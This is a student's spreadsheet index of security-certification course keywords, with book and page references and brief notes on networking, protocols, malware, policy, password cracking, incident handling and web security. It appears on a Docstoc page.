Docstoc

print_1_PRINTED_.xlsx - Yimg

Document Sample
print_1_PRINTED_.xlsx - Yimg Powered By Docstoc
					KeyWord                                               p
                                                   book age     Notes
Lan                                                 1       6   is owned by single entity,trusted users access network and server resources
Lan threat                                          1       6   disgruntled employee or trustworthy employee who was fooled.
Logic bomb inside lan                               1       6   a threat that deleted all files inside company so they lost a lot of money because of lan trust.
insider,internal threat                             1       7   someone has access to information,consider all access to lan resources when evaluating
Man                                                 1       7   spans a city or town,use high speed media,connect several facilities together
wan                                                 1       7   Large geographic area,use public networks,
Internet                                            1       7   connects many lan man wan together in the world largest network.
ISP (Internet service provider)                     1       7   responsible for intergrity and connectivity of all lans ,wans,mans
POP (point of prsence )                             1       7   Isp provide internet access to the customers through POP
NAP (network access points)                         1       7   Isp provide internet access to the customers through NAP
peering points                                      1       7   Isp provide connecitivity to each other through this points.
MAE (metropolian area exchange )                    1       7   large peering points to provide connectivity between isps.
PAN (personal area network)                         1       7   usally wireless,range <=10 m, two or more devices ,same party or different parties
bluetooth PAN                                       1       7   support up to 7 devices,cable replacement technology,can be used for proprightary protocols and for standereds based protocols
BNEP (Bluetooth network encapsulation protocol|)    1       7   responsible for delivering network packets,standered based protocol
standered based protocol                            1       7   like internet access over IP and bluetooth network encapsulation protocol
physcial topology                                   1       8   how network is wired together through geomatric shapes,how network is actually connected
bus physical topology disadvantage                  1       8   confidentiality is not guarntied,low fault tolerance,poor reliability,poor traffic isolation captabilities,limited scalability
ring physical topology disadvantage                 1       9   confidentiality is not guarntied,if one cable drpped the loop will have problem
star physical topology                              1       9   the only one that can prevent evasdrop,fault tolerance,scalability,support traffic isolation,confidentiality for traffic
ring physical topology                              1       9   each machine has 2 netowrk connection,bi-directional communication
star physical topology                              1       9   single point of failure,fault tolerance for cables only not for the faulty NICs
switched star netowrk                               1       9   best practise and the only one can prevent evesdropping
logical topology                                    1     10    the process that protocol follows to send data regard less how physical it looks like (Ethernet, Token Ring)
physcial vs. logical topology                       1     10    they are Independent on eash others
media access protocols                              1     10    protocols calrify the rules for sending signals to each other in a connected network,Ethernet,Token Ring
Ethernet                                            1     11    only single node should transimit fram at atime
CSMA/CD                                             1     11
Gigabit                                             1     11    designed for large frames sucestiple of too many small frames
Ethernet                                            1     11    Baseband,shared media,most common layer 2
Ethernet frame                                      1     11    chunk of data transmitted by machines,single machine should transmit 1 frame at a time
jumbo-sized frames                                  1     11    optimize network timing For use of maxinum bandwidth efficiency
Token ring                                          1     13    allocated time,each machine has an equal time to communicate,data travel in 1 way closed loop
Token                                               1     13    a specialised frame carry data
MAU (Multi-station access unit)                     1     13    central device passes tokens serially from 1 station to the other ,one way and in order.
Token ring communication                            1     13    an orginating machine put data into empty token then it go to destination until the orginating empty the token again
FDDI (fiber distributed data interface )            1     14    two rings,primary ring,second ring for redundancy,data in the second ring is in the opposite direction
active monitior machine                             1     14    In token ring with MAU ,primary machine checks for malfunctioning machines by polling them 7 times in each second
FDDI beacon frame                                   1     14    when a system doesn't see a token for a specific time it send beacon .
self digonastic procedure                           1     14    in token ring system identified itself having a problem will pull him self from the ring to check itsef
FDDi validation against self diagnostics            1     14    isolate the system with faulty card that can't diagnostic itself properaly
FDDI (lack of MAU)                                  1     14    can be physical ring or physical star but physical ring wouldn't allow bypassing troubled areas(disconnected ports,fault cables)
ATM                                                 1     15    Asynchronous transfer module
ATM                                                 1     15    cell=53byte,connection oriented,packet switching,shared network medium,Qos,Pvc,Svc,VPI,VCI,video streaming,low latency
VCI (Virtual Channel Id)                            1     16    associate cells with virtual connection across an ATM network
VPI (Virtual Path Id)                               1     16    VPI and VCI used to route ATM cells between swiths
Atm Pvc                                             1     16    permnant virtual circuit setupped manually in advance
ATM Svc                                             1     16    switched virtual circuit setupped automatically through a signaling protocol on the fly
Atm virtual channel identifier (VCI)                1     16    used to route cells from atm swith to another ,is identifying the connection between two ATM switches
ATM virtual Path identifier (VPI)                 1   16   to label a collection of VCI grouped into a virtual path
WAN technologies                                  1   17
dedicated lines                                   1   17   T1,T3,E1 allowing n sites to connect will need n+1 links
Frame relay                                       1   17   packet switching,less cost
MPLS (Multiprotocol Lable Switching)              1   18   layer 2.5 technology,support ip,ipv6,voip
ISDN                                              1   18   service profile identifier =10 digit isdn connection identifier =4 digit,problem backdoor
SPID (service profile identifier )                1   18   estaplish connection between ISDN sites
DSL                                               1   18   low cost,use exisiting phone lines,high speed
cable modem                                       1   18   Data over cable interface specification (DOCSIS)
wan aggregation                                   1   18   it may be necessary to implement aggregation devices to support multiple wan links and support multiple wan protocols.
data over cable interface specification(DOCSIS)   1   18   ITU,cable television comapanies provide internet access over exisiting tv cables.                                                          **
UTP                                               1   21
cat 1,2                                           1   21   voice low bandwidth
cat 3                                             1   21   voice 10 mb
cat 4                                             1   22   Voice 16 mb
cat 5                                             1   22   100 mb
cat 5e,6                                          1   22   more than 100 mb
netwok tap                                        1   22   to see all traffic in a raw wire without having to reconfigure switch
vampire tap                                       1   22   to see all traffic in coaxial without having to reconfigure switch
Time domain reflectometer                         1   22   a good cable tester to check the complience of cabling
Nic auto-sensing                                  1   23   the NIC automatically detect the cable type for proper communication
cross over                                        1   24   the primery use of it to connect external router to firewall,+tx to +rx and -tx to -rx
Network devices                                   1   25   switch, hub, router, bridge, repeater
switch layer 3,7                                  1   27
Vlan                                              1   29   create seprate networks through software not hardware
NAC (Network access control)                      1   29   isolate systems intially connected in vlans until scanned
resource seperation                               1   31   one of the elements of defense in depth (sepreate DNS,mail,web server)
Network design objectives                         1   31   seprate servers,protect internal network,provide defense in depth,protect all systems
Network segments,sections                         1   32   public ,semi-public,private
boarder router                                    1   33   to assist firewall,block rfc1918,only packet of our isp range can leave our network tp protect the firewall itself.

protocol stack                                    1   40   set of protocols needed together for communication,each layer receive a serrvice form the lower layer and provide a service to the upper   module 2
Network protocol                                  1   41   to standerize the format ,order and timing ,and the meaning ….of communications
OSI                                               1   43
transport layer                                   1   43   handle the sequencing and the provide reliable end to end connectivity
session layer                                     1   44   handles the establishment and maintainance of connection
presentation                                      1   44   handles the format and compression jpeg,mpeg..
OSI vs TCP/IP                                     1   45
layer independence                                1   46   make it faster to write network programs but make it secuirty weaker
TCP/IP packet generation                          1   47
IP (Internet Protocol)                            1   49
IPv4 header                                       1   51   minimum 20 byte maximum 60 byte
IPv4 options- record route                        1   51   tells routers to add its ip address into the options field
Ip timestamp                                      1   51   tells routers to write timestamp into the options field
IPv4 options - strict source routing              1   51   allows sender to specify exact route for destination
IPv4 options- loose source routing                1   51   allows sender to specify a list of routers a packet must pass through .it may also traverse other routers if required
IPv4 header- fields -                             1   52
routing loops                                     1   53   ttl guars against routing loops
fragmentation attacks                             1   53   send malicious commands fragmented,send too small fragments,send overlapping fragments
IPv4 header - bytes number                        1   54   byte 9:protocol number,byte 10,11 protocol check sum
class A,B,C                             1   58   A 1-127,B 128-191 ,c 192-223
CIDR (Classless Inter-Domain Routing)   1   60   uses VLSM (variable length subnetmask) to allocate Ips to subnets according to individual needs
broadcast address                       1   62
directed broadcast address              1   62   pass by router
limited broadcast                       1   62   not passed by router 255.255.255.255
private address                         1   63   10.0.0.0/8,172.16.0.0-172.31.0.0/12,192.168.0.0/16,127.0.0.0/8 loopback
MAC address                             1   65
DLCI (data link control identifier)     1   65   10 bit layer2 address , frame relay
ARP (Address resolution protocol )      1   67   given Ip address determine mac,rfc826
ARP                                     1   68   is independent of IP EtherType in ethernet frame =0x0806
Ethertype                               1   68   the field that endicate higher layer protocol in ethernet frame ,ex. IP =0x0800
arp header,types                        1   68   arp is not restricted for mac and IP only
lmhosts file                            1   72   contain mapping for netbios to Ip address
/etc/hosts                              1   72   dns system root/system32/drivers/etc/hosts
DNS - top level domains                 1   73   generic and country code +
DNs                                     1   74   domain name system,
DNS - authoriative dns server           1   74   responsible for a domain and have a list of sub domains
DNS query                               1   75   local dns server >> root dns server >> top level dns server
authoritive reply                       1   75   the client of dns can use the data and make actual connection
dns query type                          1   75   GetHostByname-GetHostByAddr
FQDN                                    1   75   full qualified domain name
Dns TTL                                 1   75   for well known sites higher TTL value to avoid overloading,for sites changing a lot lower TTL value because address change frequently
DNS - recursive query                   1   76   client ask server to do all dns lookup for them and send the final reply to client
nslookup                                1   76   a way to make forward lookup and reverse lookup
dns cache poisioning                    1   77   poisioning a dns cache so clients directed to wrong places
dns denial of service                   1   77   flooding dns server with queries
dns footprinting                        1   78   use zonetranfer and reverse lookups to learn about nwtwork,solution =limit zone tranfer,split dns
DNS - split dns                         1   78   people receive ip answers differently if they are inside or outside.
registeration spoofing                  1   78   social engineering attack ,attacker convince the registrar that the domain exist in another dns
ipv6 address space                      1   80   340 undecilion address
ipv6 vs ipv4                            1   81   ipv6 support authentication,encryption and quality of service
ipv6 features                           1   82
ipv6 autoconfiguration                  1   82   based on local mac address and information from default gateway
ipv4 over ipv6 (translation)            1   82
ipv6 over ipv4 (tunnling)               1   82   use of ipv4 protocol number =41
AYIYA                                   1   82   any thing in any thing tunnling
Teredo                                  1   82   tunnling ipv6 over udp through NAT
ipv6 fixed header size                  1   82   40 bytes of fixed size
ipv6 next header                        1   82   it's like the protocol field in ipv4 ,currently support AH and ESP
EUI (extended unique identifier )       1   83   FFFE is inserted inside the mac to identify ipv6
ipv6 network prefix                     1   83   FE80 local network,FF00 multicast traffic,2001 large isp interdomain,2002 ipv6 to ipv4 gateways
ipv6 header                             1   85   flow label and traffic class are used for Qos

UDP                                     1   92
udp checksum                            1   92   optional and not required,check the data and header,not optional for ipv6
udp multicast                           1   93   udp is used for multicasting because tcp is hard to be used in such enviroments                                                         module 3
udp port numbers                        1   93   dns=53,bootp=67,68 ,tftp=69,ntp=123,nbt=(137-139),snmp=161and162,nfs=2049
udp file transmission                   1   93   netbios used udp to transfer local files
TFTP (trivial file transfer protocol)   1   94   used to transfer files from one device to another without authentication
udp header                              1   95   size = 8 byte
Tcp common ports                            1    99    ftp 20,21 telnet 23 smtp 25 dns 53 finger 79 http 80 pop 110 https 443
ftp                                         1   100   file tansfer protocol ,rfc959
ftp command channel/control channel         1   100   user authenticateis and use commands in this channel to start transfering of files,port 21
ftp data channel                            1   100   here's the actual data transfer happen,port 20
ftp - anonymous ftp                         1   100   no predefined username and password,threat to be a warez site,prevent get with authoritive account
ftp - blind ftp                             1   101   security through obscurity,prevent one user from seeing the names of files uploaded by other users
ftp - PORT command                          1   101   can ask the ftp server to intiate the connection to sepcific port and ip address,used to scan network obscurity
ftp - active and passive                    1   102   in activer server intiate connection,in assive client intiate connection
tcp connection                              1   104   use piggy backed packets a lot send many acks
tcp header size                             1   105   normal size is 20 byte but if options used will be more than that
ECN (explicit congestion control )          1   105   the last two bits in reserved and the first 2 bits in byte 13 in tcp header ,CWR=Congestion Window Reduced,ECE=ECN echo
tcp flags                                   1   106   in the byte 13 ..URG,ACK,PSH,RST,SYN,FIN
tcp options                                 1   106   maximum segment size,windows scale,selective ack,timestamp,no operation (NOOP)
tcp - intial sequence number                1   108   a random or semi random value allow refering to bytes in packet
tcp - acknoweledge number                   1   108   it specifies the sequence number of the next byte the reciever expect
tcp flags / code bits                       1   109   C, E, U, A, P, R, S, F
tcp - (CWR) congestion window reduced       1   109   associated with protocol known as explicit congestion notification
tcp - (ECE) ECN Echo                        1   109
tcp - urgent flag                           1   109   important data is located by urgent pointer ,it's up to client to set it and up to server to decide what to do with it,telnet,rlogin
tcp - psh flag                              1   110   tells the reciever that a packet shouldnot be buffered ,telnet,SSH
tcp - (fin) connection termination          1   111   graceful termination with fin,ack…abrupt closure rst/ack
tcp - graceful termination                  1   113   tcpdump from graaceful termination using fin/ack
tcp - aborted termination                   1   114   tcpdump from aborted termination, using R flage
tcp vs udp                                  1   116   different address spaces for both udp and tcp
ICMP (internet control message protocol )   1   118   icmp is encapsulated in ip packet,connection less,error reporting,network troubleshooting
icmp payload                                1   119   the header of ip packet+ 8bytes of ip payload which include the source and destination ports
icmp common types                           1   120   typ8 echo req,typ0 echo reply,typ3 destination unreachable,typ5 redirect,typ11 time exceeded
ping                                        1   122   local lans<10ms,wan and internet>200,300 ms
icmp security issues                        1   122   covert data channel,denial of service,map a network
traceroute,tracert                          1   124   incrasing ttl value by 1 each time and check the sender ip of error destination unreachable or time exceeded
traceroute                                  1   125   unix use udp packets and windowes use icmp packets

sniffer                                     1   134   it's important to use promiscuous mode to see all traffic
dsniff,ettercap                             1   135   a tool used to sniff inside a switched network enviroment
packet sniffer usage                        1   135   monitor,gather,analyze,debug,detect,gain,filter                                                                                        module 4
sniffers examples                           1   136   rootkit sniffers seek the usernames and passwords in the network
sniffing -- switch                          1   137
ettercap                                    1   137   attacker send false arp replies to associate his mac address to the target host
libcap                                      1   138
winpcap                                     1   138
tcpdump                                     1   138   free,unix depend on libpcap,windump depend on winpcap,doesn't interpert events
tcpdump options                             1   139   x hex output, -w write to file, -r read a file, -i specify the interface, -nn don't resolve ip and port, -s specify size of packets
tcpdump icmp                                1   142   output format
tcpdump udp                                 1   143   the bytes field in the output indicate the no of bytes in udp payload
tcpdump tcp                                 1   144   in syn packet establising connection there is no data inside the tcp segment
hexadicimal                                 1   148
decoding packets                            1   150   five tips for decoding packets
decoding IP header                          1   152
decoding TCP header                         1   160
ip checksum                                 1   158   16's bit one complemnt of ip header only
bit-flipping attacks                1   158   a way to manipulate the checksum of ip header
tcp header urgent                   1   164   like ctrl+c,tcp doesn't include the size of options
tcp options size                    1   165   tcp header length-min tcp header length
tcp payload size                    1   166   total length of ip-(length of ip header+length of tcp header)

virtualization                      1   174   general term for abstraction of resources to overcome the 1: relationship between os and hw
virtualization platform             1   174   taking a software platform and running multiple platforms on a single hw,like virtual machine
virtualization resource             1   175   to virtualize hardware like the database ,each system is sharing the same hw but doesn't know that
virtual machine os level            1   176   like win vm,good because some tools don't work on specific os                                                       module 5
virtual machine application level   1   176   running application on a vm will prevent attackers from attacking the host system
host os                             1   177   the main os that runs virtual machine
guest os                            1   177   the os installed on a virtual machine
virtual machine types               1   181   virtual pc from microsoft,parallel from macintosh
vmware extentions                   1   182   .vmx vm configuration,.nvram vm bios,.vmdk vm disk file,.vmss suspended state fiel,.vmsn snap shot file
vmware player                       1   184   free run on win,linux,fully compatible
vmware workstation                  1   186   ability to create snapshots,cloning,secure portability of vm
vmware ace captability              1   187   ace feature allow you to put vm on a usb flash safely
vmware fusion                       1   191   unity feature allow you to run windowes applications on mac

Physical security - Objective       1   213
key catcher                         1   214   a small 2" device to capture key stroke ,memory up to 8 mbyte
evacuation Procedures               1   218
evacuation route posting            1   218   signs,multiple copies of evacuation procedure
meeting point                       1   219   choose easy distant walking
evacuation practise                 1   219   taking drills seriously,take aaction against who ignore alarms,employees should be trained in cross roles
safety warden                       1   220   responsible for evacuation team ,last one to leave                                                                  module 6
meeting point leader                1   220   account for employees,first one out
searcher                            1   220   check each place for employess,put signs that no one there
stairwell/door monitor              1   220   direct employess to stairs,make sure there is no dangerous material,hand a flash light to emplyes
special needs assistance            1   220   responsible for keeping list of all who need asssistance
evacuation roles                    1   220   safety warden,meeting point leader,searcher,stairwell/door monitor,special needs assistance
safety plan consideration           1   222   should consider:smoke and fire,natural gas explosion,toxins,poor air quality,structural failure
smoke and fire                      1   223   detective controls:smoke detectors,heat sensors-suppressive controls:sprinklers,fire extinguisher
optical smoke sensors               1   223   light beam and detecting plate when the smoke particles obscure the detector will alert
                                                                                                                   ⃝
heat sensors                        1   223   like thermometer operate when there is a rise in tempreture            ⃝
portable fire extinguish            1   223   comustible(paper-wood)typ A Δ - liquids:typ B :□ -electrical:typ C :
fire types                          1   223   comustible(paper-wood)typ A Δ - liquids:typ B :□ -electrical:typ C :
toxins                              1   225   Radon and carbon monoxide,use specialized detectors
toxins threat                       1   225   use a filtration masks,hermetically sealed vaults
ventilation exhaust systems         1   225   they expel the air in areas served by air-conditioning either by natural or by fans
Natural ventilation                 1   226   moving air through a door
Toxic dampers                       1   226   ventialtion systems equipped with them to prevent the toxic gas spreading through the vintilation system
water/flood                         1   227   detective controls:mositure-humidiity sensors,corrective controls:bilge pump,evacuation
mositure detectors                  1   227   a detective control used to detect water/flood ,installed on surfaces
humidity detectors                  1   227   a detective control used to detect water/flood ,used for water vapor
pilge pump                          1   227   corrective control for water/flood to remove water
structural failure                  1   228   can happen from gradual sturtural weaking or sudden weaking,detective controls:structural assesment,sudden imapct
gradual structural weaking          1   228   a result of a series of lesser events
structural gradual weaking          1   228   a result of a series of lesser events
sudden structural failure           1   228   may result from earthquacks,storms,explosions,sinkholes
structural sudden event             1   228   may result from earthquacks,storms,explosions,sinkholes
structural assesment                1   228   a detective control when taking old building
managing power                      1   229   power needs are increaing,server density is increasing,it takes long time to increase capcity
managing cooling                    1   229   increased server density means more heat,tempreatures varies from place to place
power and cooling issues            1   230   average 65F or 18c,redundancy,scalable solutions,humidity=45%
power quality issue - sag           1   231   voltage drop (short)
power quality issue - brownout      1   231   voltage drop (sustained)
power quality issue - spike         1   231   voltage increase (short)
power quality issue - surge         1   231   voltage increase (sustained)
power quality issue - fault         1   231   power failure (short)
power quality issue - blackout      1   231   power failure (sustained)
UPS (uninteruptable power supply)   1   232   installed inline-sufficient power to (15-30)min
backup generators                   1   232   covert fuel into electrical power,aren’t suitable for short duration failures because it needs time to warm up
restricted area                     1   234   measures must be implemented to avoid unwanted access,detected if unwanted access occurs,procedure if breach happen
primeter defination                 1   234   enclosed space has been labeled a restricted area
primeter assesment                  1   234   area geography,traffic patterns,activities of other buildings,area crime statics,
primeter dimensions                 1   235   floor:raised foors,in-floor ventilation,wall:doors,windows
unauthorized access                 1   236   deternet controls to prevent it using guards ,signs,employee only signs
restricted area - escort            1   237   employee escort:disable all his access,take badge,parking decal,escorted by guard or at least two managers
escort from restricted area         1   237   employee escort:disable all his access,take badge,parking decal,escorted by guard or at least two managers
access control types                1   238   directive,preventive,deterent,detective,suppressive,reactive,corrective
unauthorized access - Preventive    1   239
locks                               1   238   traditional ,cipherlocks,smartcard,smartcard with passcode,biometrics
traditional locks                   1   240   consist of metal lock and key,re-keying must be performed for all users
cipher/combination locks            1   240   mechanical locks accept one vaild sequence,electronic locks can be programmed with multiple keys
cipher/combination locks            1   240   rekeying must be performed for all user if any one user is to be removed from authorized list
smart cards                         1   241   electronic badges that include a magnetic strip or chip that can record and reply aset key
smart cards rekeying                1   241   rekying is inexpensive because it requires only removing the current acceptable code from the lock
biometrics                          1   241   provide the checking for physical characteristics of human body
mantraps                            1   241   a secure portal that require the individual to identify himself to pass
contraband checks                   1   242   deterent controls and detective,x-ray scanner,metal detector,bag inspection
unauthorized access - Deterring     1   242   fences, X-ray scanners, Metal detector, Bag inspection
fences                              1   242   deterent controls
unauthorized access - Detecting     1   243   CCTV, Watch towers, Motion detector, heat sensors
CCTV (closed circuit television)    1   243   detective and preventive control
dummy camera                        1   243   preventive control
security lights                     1   243   detective control
panic button                        1   244   detective control , silent alarm to not to inform intruder
automatic intruder detection        1   244   vibration,heat,pressure,beam sensors
safety walkthrough                  1   245   exit doors must be clear,door function propably,alarms fully functional,people know what to do
physical security - managing        1   246   encryption,guards,signs,mantraps,shred everthing,inspect package to know what leaving your organization
Key word                      Book       Page
DID                                  2       6
Risk                                 2       7
Key focus of Risk                    2       8
Pritorizing CIA                      2      10
Threat                               2      11
Vulnerabilities                      2      12
DID - Approaches to did              2      14
Uiform protection                    2      15
Protected Enclaves (‫)جيوب‬            2          16
Information Centric                  2          17
Vector-Oriented DID                  2          18
Malicious SW                         2          20
Malware                              2          20
malicious mobile code                2          20
Viruse                               2          21
Parasitic Malware                    2          21
Boot record infector                 2          21
Marco Virus(Worm)                    2          22
Program Infectors                    2          22
File Infectors                       2          22
COM/Script Program Infector          2          23
cavity viruses                       2          23
EXE program infector                 2          24
CS(code Segment)                     2          24
IP(Instruction Pointer)              2          24
Multipartite Viruses                 2          24
Worms                                2          25
worm - Impacts                       2          26
Morris Worm                          2          27
Linux Worms                          2          28
Ramen                                2          28
Lion                                 2          29
SQL Slammer                          2          30
MSDE                                 2          30
Sasser Worm                          2          31
Netsky Worm                          2          31
Conficker worm                           2   32
worms - Fix Worm                         2   33
Worms - configuration management         2   34
configuration management                 2   34
Baseline document                        2   35
Malicious Browser content                2   36
Active X                                 2   36
DropMyRights                             2   36
Malware Capability                       2   37
CIH Virus                                2   37
chernobyl virus                          2   37
Melissa virus                            2   37
Caligula virus                           2   37
Marker virus                             2   37
Leaves Worm                              2   38
IRC(Internet Relay Chat)                 2   38
Malware propagation techniques           2   39
Sadmind/IIS worm                         2   40
blended threat                           2   41
Nimda                                    2   41
Instant Messaging application            2   41
Peer-to-peer neworking                   2   41
Deadhat virus                            2   41
piggybacking                             2   41
MyDoom worm                              2   41
SoulSeek                                 2   41
Malware Defense technique                2   42
Antivirus capability                     2   42
antivirus -Scanners                      2   43
antivirus - Activity monitoring          2   43
antivirus - Integrity check              2   43
heuristic(‫- )ارشادي‬anti-virus -          2   43
anti-virus - heuristic(‫)ارشادي‬           2   43
Tripwire Sw                              2   43
AIDE                                     2   43
Stripping E-mail Attachment              2   44
antivirus -Stripping E-mail Attachment   2   44
Malware - Analysis                       2   45
Malware - Mitigating                    2   45
Patch Management                        2   45
Network-aware tools                     2   45
Tripping point                          2   45
Malware - user education and policy     2   46

Security policy                         2   52
Security policy - Why ?                 2   52
policy - Convincing the org by policy   2   54
Mission Statement                       2   55
Security posture(‫)الوضعيه‬               2   56
conservative approach(‫)المحافظ‬          2   56
liberal approach(‫)متحرر‬                 2   56
Posture Issues Example                  2   57
policy - Baseline document              2   59
Baseline document - policy              2   59
ISO 17799                               2   59
HIPAA                                   2   59
AUP (Acceptable use policy)             2   59
policy vs. Procedure                    2   60
Procedure vs. policy                    2   60
policy - definition                     2   61
Procedure - definition                  2   62
Standard - definition                   2   63
Baseline - definition                   2   64
Guideline - Definition                  2   65
Issue-specific Policies                 2   67
policy table of content                 2   68
policy statement must                   2   70
SMART                                   2   70
ISMS                                    2   71
Policy categories                       2   71
Program Policy                          2   71
Issue-specific Policies                 2   71
System Specific Policy                  2   71
Policy - Creating                       2   73
Policy Creating - Issue                 2   74
AUP (Acceptable use policy)             2   74
policy - Scope/Applicability      2    75
Non-Compliane                     2    76
Penalties                         2    76
Issue-specific Policies Example   2    77
Non-Dislosure Agreement           2    78
NDA (Non-Dislosure Agreement)     2    78
Copyright                         2    79
Intellectual Property             2    79
DMCA                              2    80
POC                               2    80
Contingency planning(‫)طوارئ‬       2    82
BCP (business continuity plan)    2    83

BRP (Business Resumption plan)    2    84
DRP (disaster recovery plan)      2    85
BCP Vs. DRP                       2    87
BCP/DRP                           2    88
Insurance model                   2    88
Split operation Model             2    88
Routing workload                  2    88
BCP elements                      2    89
BCP Key Component                 2    91
BIA (Business Impact Analysis)    2    92
MTD(maximum tolerable downtime)   2    92
BCP-DRP lifecycle                 2    94
BCP/DRP Mistakes                  2    95

Access Control                    2   101
Access Control Scope              2   102
Data Owner                        2   103
Data Custodian(‫)حضانه‬             2   103
Account Management                2   102
Account control                   2   102
Data classification               2   104
SBU (senstive but unclassified)   2   104
Identity                          2   106
Authentication                           2   106
Authorization                            2   106
Accountability                           2   106
sometthing you know                      2   106
sometthing you have                      2   106
sometthing you are                       2   106
someplace you are                        2   106
Access Contol / Controlling Access       2   108
need to know                             2   108
Access Control Techniques                2   109
DAC (Discretionary Access control)       2   109
MAC (Mandatory Access control)           2   109
RBAC (Role-based Access control)         2   109
REBAC(ruleset-based Access control)      2   110
List based Access control                2   110
Token based Access control               2   110
Access managing                          2   111
account administration                   2   111
SSO (Single Sign On )                    2   112
Centralized control                      2   114
PAP(Password Authen Protocol)            2   113
CHAP(Challenge Handshake Authen pr)      2   113
Dial-in Authentications                  2   114
TACACS (terminal access control*2 sys)   2   114
RADIUS (Remote Authen dial-in usr svc)   2   114
DIAMETER                                 2   113
AD Authentication                        2   114
Kerberos - Authentication                2   113
Replay attack                            2   113
Windows NT authen                        2   114
Reversible encryption                    2   116
EFS (Encrypted file system)              2   116
reverse engineering                      2   116
irreversible encryption                  2   117
one way encryption                       2   117
Access control: Passwords                2   118
Cracking                                 2   119
password cracking                   2   119
password cracking - methods         2   122
password storage                    2   119
password Strength                   2   120
password assessment                 2   122
cacking - methods                   2   123
Dictionary attack                   2   123
Hybrid attack                       2   123
Brute force attack                  2   123
Pre-computation Attack              2   124
Rainbow table                       2   124
Cracking Motivation                 2   124
John the Ripper+MD5                 2   125
Bit-slicing                         2   125
open BSD                            2   125
free BSD                            2   125
John Ripper support                 2   126
John Ripper support Cracking mode   2   126
wordlist mode                       2   126
single crack mode                   2   126
incremental mode                    2   126
external mode                       2   126
Cracking RedHat pass file           2   126
john.ini                            2   126
MD5                                 2   127
Windows password                    2   128
Lan man                             2   128
cain-password cracking              2   130
DLL injection                       2   130
SYSkey                              2   130
SAM                                 2   131
cain - Dictionary attack            2   131
cain - Brute force attack           2   131
cain - Cryptanalysis attack         2   131
Rainbow table                       2   133
cryptanalytic                       2   133
Winrtgen                            2   134
Ophcrack                            2   134
Charest.txt                         2   134
Zhu's Rainbwcrack                   2   134
Zhu's Rainbwcrack                   2   136
cain - Rainbw tables                2   136
protect pass crack                  2   137
password policy - Enforce strong    2   138
password policy - Enforce strong    2   139
Shadow passwords                    2   141
one-time password                   2   142
Token-based devices                 2   142
Chalenge/response                   2   142
S/Key                               2   142
Biometrics                          2   144
Mannerisms                          2   144
Portal throughput                   2   144
Type I, A error                     2   144
Type II,B error                     2   145
False Reject Rate                   2   145
False Accept Rate                   2   145
Crossover Error                     2   145
Equal error rate                    2   145
FRR (False Reject Rate)             2   145
FAR (False Accept Rate)             2   145
CER (Crossover Error)               2   145
EER(Equal error rate)               2   145
Enrollment                          2   145
Facial thermograms                  2   145
NTLM                                2   146
NTLMv2                              2   147
Pre-computation                     2   147
LMCompatability Level registry      2   146
Pre-computation attack - fighting   2   147

Incident Handling                   2   153
Incident                            2   155
Event                               2   156
Incident                            2   157
incident handling steps               2   159
Incident Handling-Preparation(1)      2   160
Incident Handling-Preparation(1)      2   162
Jump Bage content                     2   163
Incident Handling-identification(2)   2   164
Incident Handling-identification(2)   2   165
Incident Handling-Containment(3)      2   166
Incident Handling-Eradication(4)      2   168
Incident Handling-Recovery(5)         2   170
Incident Handling-Lesson learned(6)   2   172
Incident Handling-Mistakes            2   173
Incident Handling-summarry            2   174
Legal aspects of Incident Handling    2   174
Legal system                          2   176
Common law                            2   176
Criminal law                          2   177
Civil law                             2   177
Regulation                            2   178
HIPAA                                 2   178
SOX()                                 2   178
PCI (Payment card industry)           2   178
FDA                                   2   178
FDIC                                  2   178
OCC                                   2   178
BIS                                   2   178
GLBA                                  2   178
SB1386                                2   178
LOPD                                  2   178
Seizure with warrant                  2   179
Seizure                               2   179
warrant                               2   179
Arrest                                2   181
False Arrest                          2   181
Evidence - Admissible                 2   182
surveillance                          2   183
Chain of Custody(‫)حجز‬                 2   184
Evidence integrity                    2   186
Real evidence                         2   187
Direct Evidence                    2   187
Hearsay evidence                   2   187
Best evidence                      2   188

IW (Information Warfare)           2   192
Information Warfare                2   192
information warfare examples       2   194
information warfare tools          2   197
Peception management               2   197
Warefare affecting US Presidency   2   198
Offshore coding                    2   199
Warefare and Terrorism             2   200
information Warefare theory        2   202
IW -Asymmetric warfare             2   202
Zero-sum game                      2   202
IW - Cycle time                    2   204
IW - indication and warning        2   205
indication and warning Model       2   205
Stimulus vs. response              2   206
info warfare - Offensive player    2   207
IW - Offensive player              2   207
IW - offensive operation goals     2   208
IW - increase value to offense     2   209
IW - Confidentiality attacks       2   209
IW - Decrease value to defense     2   210
IW - Defense is not dominant       2   211

Web communications                 2   217
Web application architecture       2   218
presentation tier                  2   218
application tier                   2   218
persistant tier                    2   218
two-tier web application           2   218
three-tier web application         2   218
N-tier web application             2   219
Web architecture Hardening         2   220
Server Hardening                   2   220
Data base Hardining                2   221
HTTP                              2   222
URL Format                        2   222
HTTP Header / Metadat             2   222
HTTP Status code                  2   222
HTTP Transactions                 2   224
HTTP Status code                  2   225
HTML(Hypertext Markup language)   2   226
HTML Forms                        2   227
Form Submission Action            2   227
HTTP Methods                      2   217
GET                               2   228
POST                              2   228
QUERY_STING                       2   228
URL encoding                      2   228
MIME encoding                     2   228
HTML form example                 2   229
Cookies                           2   231
Persistent Cookie                 2   232
Session cookie                    2   232
Achilles                          2   232
Paros                             2   232
SSL (secure socket layer)         2   234
TLS (transport layer security)    2   234
Server side Programming           2   236
CGI common gateway interface      2   236
Apache Tomcat                     2   236
Client side programming           2   238
Sandbox                           2   238
Code signing                      2   239
java applet(Signed java applet)   2   239
Activex (signed Activex )         2   239
DLL (Dynamic linked library)      2   239
Web application Secure            2   240
SW testing                        2   240
web - Performance testing         2   241
web - configuration management    2   241
web - Version contol              2   241
web - staging and deployment      2   241
Secure coding                      2   242
Validate                           2   242
obfuscation                        2   242
off-the-shelf library              2   243
wep application service provider   2   244
ASP application service provider   2   244
SLE (service level agreement)      2   244
wep vulnerabilities                2   246
Web Authentication                 2   247
Basic mode Authentication          2   247
Digest mode Authentication         2   248
HTTP Authentication                2   247
Form based Authentication          2   248
Base-64 encoding                   2   247
INPUT TYPE="PASSWORD"              2   248
Web Authentication attack          2   248
Multifactor Authentication         2   248
Token web Authentication           2   249
One-time pad Authentication        2   249
out-of-band Authentication         2   249
footprint web Authentication       2   249
Challenge question web authen      2   249
web access control                 2   250
Exploration Air                    2   250
web - Front page MS                2   250
Directory traverse attack          2   251
session tracking                   2   252
session id                         2   252
session hacking                    2   253
Seeion Attack Protection           2   255
session toolkit                    2   255
input attacks                      2   257
command injection                  2   258
OS command injection               2   258
OS command injection defense       2   259
Buffer overflow attack             2   260
arbitrary code execution           2   260
Buffer overflow defence        2   261
